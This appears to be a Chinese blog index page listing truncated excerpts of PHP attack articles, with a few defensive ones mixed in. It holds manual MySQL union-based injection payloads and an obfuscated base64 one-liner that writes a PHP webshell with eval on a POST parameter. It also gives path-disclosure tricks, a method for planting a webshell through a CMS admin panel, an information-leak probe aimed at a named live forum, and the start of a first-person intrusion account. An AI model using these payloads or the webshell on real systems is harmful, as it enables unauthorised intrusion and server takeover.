PHP+MySQL 手工注入语句

暴字段长度 order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select ver...

- 阅读全文 -

PHP一句话变型

<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?> <script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),bas...

- 阅读全文 -

(老文章)PHP程序漏洞产生的原因和防范方法

滥用include 1.漏洞原因: Include是编写PHP网站中最常用的函数,并且支持相对路径。有很多PHP脚本直接把某输入变量作为Include的参数,造成任意引用脚本、绝对路径泄露等漏洞。看以下代码: ... $includepage=$_GET["includepage"]; include($includepage); ... 很明显,我们只需要提交不同的Includepage变量就可...

- 阅读全文 -

PHP系统暴绝对路径的方法收集

1、加引号'这个最常用   2、变参数类型,比如把id=1改为id=a等 有时很有效果   3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果   4、text.php?aa[]=xx   5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷...

- 阅读全文 -

PHP base64_decode 的两种破解方法

实际应用: 首先,打开你的文本编辑器,比如记事本,新建一个文本文件,按照那个解密代码,把我的那个footer.php文件里的密码输入进去,然后就类似下面: <?php $Code = 'bZA7b8MwDIR3/wpCQ9MudtCpaPxYOmTo1gIZC9mibSGyKEiM1QD98fUjWVovBHQ83n1QVSa50iM0RoZQiJaI0Yst8Yu/eV7UHrJynclD...

- 阅读全文 -

php后台插一句话新思路

php后台插一句话的思路加114网址导航后台拿webshell的方法。 首先介绍下php的各种标签: 1): <?php ?> demo: <?php echo "test";?> 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): <? echo "test"; ?> 这种标签是在以前很普遍的一种用法php 老版本开发的cms大...

- 阅读全文 -

利用“PHP彩蛋”进行敏感信息获取

关于“PHP彩蛋”的说法也许很多老PHPer已经都知道或听说了,好像是早在PHP4版本的时候就有彩蛋了,挺好玩儿的,可能近年来逐渐被人们遗忘了,其实彩蛋功能在PHP脚本引擎默认情况下是开启。 下面就用Discuz官方论坛做一下测试: http://www.discuz.net/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 http://www.discuz.n...

- 阅读全文 -

关闭PHP错误报告

int error_reporting(int [level]); 0:关闭错误报告 E_NOTICE 表示一般情形不记录,只有程式有错误情形时才用到,例如企图存取一个不存在的变数,或是呼叫 stat() 函式检视不存在的档案。 E_WARNING 通常都会显示出来,但不会中断程式的执行。这对除错很有效。例如:用有问题的常规表示法呼叫 ereg()。 E_ERROR 通常会显示出来,亦会中断程式执...

- 阅读全文 -

PHP伪静态与防注入

PHP伪静态,主要是为了隐藏传递的参数名;于网上搜索后整理伪静态四法 <?php //伪静态方法一 // localhost/php100/test.php?id|1@action|2 $Php2Html_FileUrl = $_SERVER["REQUEST_URI"]; echo $Php2Html_FileUrl."<br>";// /php100/test.php?id|...

- 阅读全文 -

记一次踩着别人的脚印入侵

话说今早不知道怎么逛到https://www.webshell.cc/1.txt那里去了PS:后来想起是村长大牛提交的黑页 看见别人挂这个多好看啊,于是小菜也是想起了来检测一番的念头,既然有了想法就开始干活吧,主站打不开了,估计是给弄坏了,于是想起旁注了,看看是不是独立的站点,打开土司的旁注查询,把域名放进去看看,幸亏不是独立的站点 哇!!这个站还真不少..72个,其实还是有好多没法打开.. 开始一...

- 阅读全文 -